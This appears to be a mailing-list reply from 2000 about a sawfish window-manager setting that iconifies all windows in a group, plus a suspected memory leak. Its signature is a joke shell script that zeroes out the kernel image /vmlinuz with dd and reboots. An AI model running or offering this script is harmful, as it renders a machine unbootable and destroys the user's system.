On Thu, Jun 29, 2000 at 01:01:21PM -0400, Stuart Ballard wrote: > Has anyone else noticed that it's impossible to minimize just one window > if others have the same title? I frequently have lots of terminal > windows up and if I try to minimize one, they all disappear. > > I'm using up-to-the-second helix GNOME on woody - so I guess I should > technically take it up with helix. Just wondering if anyone else has > been seeing the same thing, though...
Perhaps, the "group windows" option is set in your sawfish configuration? I forget the title of the option exactly, but it sets a variable for sawfish telling it to iconify all windows in a group (same application). I've always had that turned off when using saw{mill|fish} so I don't know if that's the culprit. Last I used sawfish it apparently had a terrible memory leak (or at least, the memory leakage went away when I switch to icewm-gnome -- the memory leak showed up under the X server, but I suspect it was the window manager's fault). -- #! /bin/sh echo 'Linux Must Die!' | wall dd if=/dev/zero of=/vmlinuz bs=1 \ count=`du -Lb /vmlinuz | awk '{ /^([0-9])+/ ; print $1 }'` shutdown -r now